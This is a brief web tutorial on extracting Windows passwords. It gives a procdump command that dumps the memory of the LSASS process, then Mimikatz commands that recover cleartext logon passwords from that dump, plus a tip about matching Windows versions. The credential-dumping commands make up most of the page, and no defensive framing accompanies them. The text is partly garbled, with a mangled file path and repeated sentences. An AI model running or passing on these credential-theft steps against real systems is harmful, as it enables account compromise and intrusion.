Ready to Start Your Career?

By: Parichay Rai
February 22, 2017
Tutorial: Extracting Passwords

By: Parichay Rai
February 22, 2017

C:UsersparichayDownloadsProcdump>procdump.exe -ma -64 lsass.exe pass.dmp (-64 is for 64 bit OS)
This dump can be used to extract clear text passwords using our beloved MimiKatz. The command to extract the clear text password from the dump is:The command to extract the clear text password from the dump is:mimikatz # sekurlsa::minidump pass.dmp
mimikatz # sekurlsa::logonPasswords full
One thing that you should know before using MimiKatz on the extracted dump is the Windows NT compatibility. Make sure that the version of windows from which you extract the password and the windows machine that you will use to extract the passwords should be the same version. Please refer to this Wikipedia source for more: https://en.wikipedia.org/wiki/Windows_NTPlease refer to this Wikipedia source for more: https://en.wikipedia.org/wiki/Windows_NT